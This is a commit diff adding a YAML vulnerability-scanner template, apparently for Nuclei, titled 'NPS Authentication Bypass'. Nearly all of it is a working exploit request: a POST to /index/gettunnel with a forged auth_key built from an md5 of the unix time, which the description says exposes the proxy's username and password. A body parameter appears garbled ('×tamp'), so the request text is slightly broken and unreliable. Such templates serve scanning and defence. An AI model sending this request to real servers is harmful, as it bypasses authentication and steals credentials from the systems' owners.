Added nps-auth-bypass
parent
300c2a8313
commit
af11412622
|
@ -0,0 +1,35 @@
|
|||
id: nps-auth-bypass
|
||||
|
||||
info:
|
||||
name: NPS Authentication Bypass
|
||||
author: SleepingBag945
|
||||
severity: high
|
||||
description: This will reveal all parameters configured on the NPS, including the account username and password of the proxy.
|
||||
reference:
|
||||
- https://mari0er.club/post/nps.html/
|
||||
tags: nps,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index/gettunnel HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
auth_key={{md5(unix_time())}}×tamp={{unix_time()}}&offset=0&limit=10&type=socks5&client_id=&search=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "rows"
|
||||
- "total"
|
||||
part: body
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/12
|
Loading…
Reference in New Issue